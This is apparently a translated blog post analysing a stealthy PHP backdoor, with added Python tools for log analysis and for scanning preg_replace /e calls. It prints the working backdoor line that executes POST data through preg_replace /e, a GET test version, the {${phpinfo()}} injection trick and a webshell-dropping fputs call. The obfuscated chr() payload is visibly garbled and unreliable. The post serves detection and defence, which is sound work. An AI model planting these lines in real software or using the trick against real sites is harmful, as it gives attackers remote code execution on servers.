Here is the situation: a friend's site had a PHP Trojan that none of the usual backdoor-search tools could find. We could never locate it, and the attacker was quite sophisticated: every time he used the backdoor he deleted it afterwards, yet he could always get back in, and we could not work out from where. It was a real headache.
Eventually I found traces in the logs. Going through them, I noticed one IP that kept POSTing odd data to a file, and some time later the same IP would access a strangely named file, clearly not a normal system file but a PHP backdoor. Soon after it was used, the backdoor was deleted again.
Ha, this attacker was very careful.
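The log pattern described above (one IP repeatedly POSTing to an oddly named PHP file that later disappears) can be turned into a simple detection rule. The following Python script is an added example, not part of the original post: it parses constructed access-log lines in combined log format, collects the .php paths that accepted POST requests, drops the application's known entry points (an assumed allowlist), and reports paths that only a single client used and that later returned 404. The IP addresses, timestamps and the /data/a.php sample path are constructed for the example.

```python
import re
from collections import defaultdict

# Apache/Nginx combined log format (fields after the request line are ignored).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log (IPs, timestamps and paths are made up for this example;
# /data/a.php mirrors the file the post says the attacker dropped).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /forum.php?mod=viewthread&tid=12 HTTP/1.1" 200 5123
198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "POST /forum.php?mod=post&action=reply HTTP/1.1" 200 812
198.51.100.4 - - [10/Oct/2023:13:57:14 +0000] "POST /index.php HTTP/1.1" 200 640
203.0.113.7 - - [10/Oct/2023:13:58:02 +0000] "POST /index.php HTTP/1.1" 200 640
203.0.113.7 - - [10/Oct/2023:14:01:19 +0000] "POST /data/a.php HTTP/1.1" 200 312
203.0.113.7 - - [10/Oct/2023:14:01:25 +0000] "POST /data/a.php HTTP/1.1" 200 312
203.0.113.7 - - [10/Oct/2023:14:03:40 +0000] "GET /data/a.php HTTP/1.1" 404 209
"""

# Assumed allowlist of the application's legitimate POST handlers.
KNOWN_ENTRYPOINTS = {"/forum.php", "/index.php"}


def parse_line(line):
    """Parse one combined-format line into a dict, or return None on mismatch."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]   # drop the query string
    rec["status"] = int(rec["status"])
    return rec


def suspicious_post_targets(log_text, known_entrypoints):
    """Return {path: {"ips": set, "posts": int, "vanished": bool}} for .php paths
    that accepted POSTs (status 200), are not known entry points, and were used
    by at most one client. "vanished" marks paths that later returned 404, the
    drop-use-delete pattern the post describes."""
    seen = defaultdict(lambda: {"ips": set(), "posts": 0, "vanished": False})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].endswith(".php"):
            continue
        path = rec["path"]
        if rec["method"] == "POST" and rec["status"] == 200:
            seen[path]["ips"].add(rec["ip"])
            seen[path]["posts"] += 1
        elif rec["status"] == 404 and path in seen:
            seen[path]["vanished"] = True
    return {
        path: info for path, info in seen.items()
        if path not in known_entrypoints and len(info["ips"]) <= 1
    }


def actors(findings):
    """Client IPs behind the flagged paths, for pivoting back into the full log."""
    return sorted({ip for info in findings.values() for ip in info["ips"]})


if __name__ == "__main__":
    hits = suspicious_post_targets(SAMPLE_LOG, KNOWN_ENTRYPOINTS)
    for path, info in hits.items():
        print(path, info)
    print("actors:", actors(hits))
```

On a real server the allowlist is the application's documented entry points, and the single-client threshold should be relaxed for busy sites; the useful signal is the combination of an unknown .php target, a POST body, and the file disappearing afterwards.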
Then, analysing the file the attacker had been accessing, I found this code.
The code is as follows:
@preg_replace("//e", $_POST['In_comsenz'], "Access Denied");
At first sight this code looks harmless, but it is the malicious code the attacker hid, and it is the backdoor itself. Hidden like this, essentially no anti-malware scanner detects it.
Prototype of the preg_replace function:
mixed preg_replace(mixed pattern, mixed replacement, mixed subject [, int limit])
Special note:
The /e modifier makes preg_replace() treat the replacement parameter as PHP code (after the appropriate backreferences have been substituted). Tip: make sure the replacement forms a valid PHP code string, otherwise PHP reports a parse error on the line containing the preg_replace() call.
The code above takes its data from a POST request, which makes it awkward to test; it is easier if you change it to GET data.
Example:
The code is as follows:
echo preg_replace("/test/e", $_GET["h"], "just test");
If we submit h=phpinfo(), then phpinfo() is executed (with the /e modifier, preg_replace executes the replacement parameter as PHP code).
Now suppose the data is submitted via POST. What happens if we test with the following (obfuscated) code?
The code is as follows:
Chr (102). CHR (112). CHR (117). chr (116). chr (h=eval). chr (CHR). 102. chr (CHR). 112 (a). chr
(CHR). Chr (a). Chr (a). Chr (a). chr (116). Chr (in). Chr (a). Chr (a). Chr (a). chr (112). Chr (a). chr (112). Chr (M). chr (CHR). chr (119). Chr (a). Chr (a). Chr (a). Chr (a). chr (CHR). chr (CHR). chr (112). Chr (a). Chr (118). Chr (in). Chr (108). Chr (a). Chr (a). chr (km). chr (CHR). chr (CHR). CHR (109). Chr (a). chr (M). Chr (a). Chr (a). Chr (a). Chr (59)). |
Decoded, the obfuscated string corresponds to:
The code is as follows:
fputs(fopen("data/a.php", "w"), /* trojan body omitted in the original */);
Executing it creates a one-line trojan file (a one-liner webshell) named a.php in the /data/ directory.
This is frightening.
A trickier example:
The code is as follows:
<?php
function test($str) {
    // body intentionally empty: the call only matters as the evaluated replacement
}
echo preg_replace("/\s*\[php\](.+?)\[\/php\]\s*/ies", 'test("\1")', $_GET["h"]);
?>
If we submit h=[php]phpinfo()[/php], is phpinfo() executed?
Certainly not. After the regex matches, the replacement parameter becomes test("phpinfo()"), so phpinfo() is only passed along as a string argument.
Is there any way to make it run?
Of course. If we submit h=[php]{${phpinfo()}}[/php], phpinfo() is executed. Why?
In PHP, a variable inside a double-quoted string is replaced by its value when the string is interpreted; a variable inside single quotes is not processed.
Note: function calls inside double quotes are not executed or substituted.
So we construct a special variable with {${}}: the replacement becomes test("{${phpinfo()}}"), and that gets the function executed (${phpinfo()} is interpreted, which runs phpinfo()).
You can verify this first with:
echo "{${phpinfo()}}";
phpinfo() runs successfully.
So when you are hunting for backdoors, keep an eye out for this.
OK, that is enough; you get the idea. Once more, the code I found:
The code is as follows:
@preg_replace("//e", $_POST['In_comsenz'], "Access Denied");
A seemingly normal line of code that is in fact extremely dangerous, and hidden quite deep.
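The preg_replace variants discussed on this page (request data used directly as the /e replacement, and request data reaching an /e replacement through a backreference) share one detectable shape in source code. The following Python scanner is an added example, not code from the original post: it locates preg_replace() calls, splits their arguments while respecting quotes and nested parentheses, reads the modifier letters after the pattern's closing delimiter, and grades each /e call by where the request data enters. The sample PHP files are constructed from the snippets on this page, and the severity labels are the example's own.

```python
import re

# Request-controlled sources (the scanner's own list, not from the original post).
SUPERGLOBALS = ("$_GET", "$_POST", "$_REQUEST", "$_COOKIE", "$_SERVER", "$_FILES")
CALL_RE = re.compile(r"\bpreg_replace\s*\(", re.IGNORECASE)  # PHP function names are case-insensitive
BACKREF_RE = re.compile(r"\\\d|\$\{?\d")                      # \1, $1, ${1}


def split_call_args(src, open_paren):
    """Split the arguments of the call whose '(' is at src[open_paren].
    Returns the list of top-level argument strings, or None if unbalanced."""
    depth, quote, cur, args = 0, None, [], []
    i, n = open_paren, len(src)
    while i < n:
        c = src[i]
        if quote:                        # inside a string literal
            cur.append(c)
            if c == "\\" and i + 1 < n:  # keep escape pairs intact
                cur.append(src[i + 1])
                i += 2
                continue
            if c == quote:
                quote = None
        elif c in "\"'":
            quote = c
            cur.append(c)
        elif c == "(":
            depth += 1
            if depth > 1:
                cur.append(c)
        elif c == ")":
            depth -= 1
            if depth == 0:
                args.append("".join(cur).strip())
                return args
            cur.append(c)
        elif c == "," and depth == 1:
            args.append("".join(cur).strip())
            cur = []
        else:
            cur.append(c)
        i += 1
    return None


def pattern_modifiers(arg):
    """Modifier letters of a quoted PCRE literal such as "/foo/ie"; None if not a literal."""
    if len(arg) < 3 or arg[0] not in "\"'" or arg[-1] != arg[0]:
        return None
    body = arg[1:-1]
    delim = body[0]
    closing = {"(": ")", "[": "]", "{": "}", "<": ">"}.get(delim, delim)
    end = body.rfind(closing)
    return body[end + 1:] if end > 0 else None


def _from_request(expr):
    return any(g in expr for g in SUPERGLOBALS)


def scan_php(src):
    """Return a finding for every preg_replace() call that uses the /e modifier."""
    findings = []
    for m in CALL_RE.finditer(src):
        args = split_call_args(src, m.end() - 1)
        if not args or len(args) < 3:
            continue
        pattern, replacement, subject = args[:3]
        mods = pattern_modifiers(pattern)
        if mods is None or "e" not in mods:
            continue
        if _from_request(replacement):
            severity, why = "critical", "replacement is request data and is evaluated as PHP"
        elif _from_request(subject) and BACKREF_RE.search(replacement):
            severity, why = "high", "request data reaches the evaluated replacement through a backreference"
        else:
            severity, why = "medium", "/e modifier in use (removed in PHP 7); review"
        findings.append({
            "line": src.count("\n", 0, m.start()) + 1,
            "modifiers": mods,
            "severity": severity,
            "reason": why,
            "call": src[m.start():m.start() + 80].splitlines()[0],
        })
    return findings


# Constructed sample files built from the snippets on this page.
SAMPLES = {
    "backdoor.php": r'''<?php
@preg_replace("//e", $_POST['In_comsenz'], "Access Denied");
''',
    "get.php": r'''<?php
echo preg_replace("/test/e", $_GET["h"], "just test");
''',
    "bbcode.php": r'''<?php
function test($str) {}
echo preg_replace("/\s*\[php\](.+?)\[\/php\]\s*/ies", 'test("\1")', $_GET["h"]);
''',
    "safe.php": r'''<?php
echo preg_replace("/\s+/", " ", $_GET["h"]);
''',
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        for f in scan_php(src):
            print(f"{name}:{f['line']} [{f['severity']}] {f['reason']}: {f['call']}")
```

The /e modifier was deprecated in PHP 5.5 and removed in PHP 7, so on modern PHP such a call only emits a warning; on older installations the fix is preg_replace_callback(), which hands the match to a real function instead of evaluating a string. The scanner grades any backreference from request data as high rather than looking for braces in the input, because with /e PHP escapes quotes in substituted backreferences, so the dangerous input is not distinguished by quote characters.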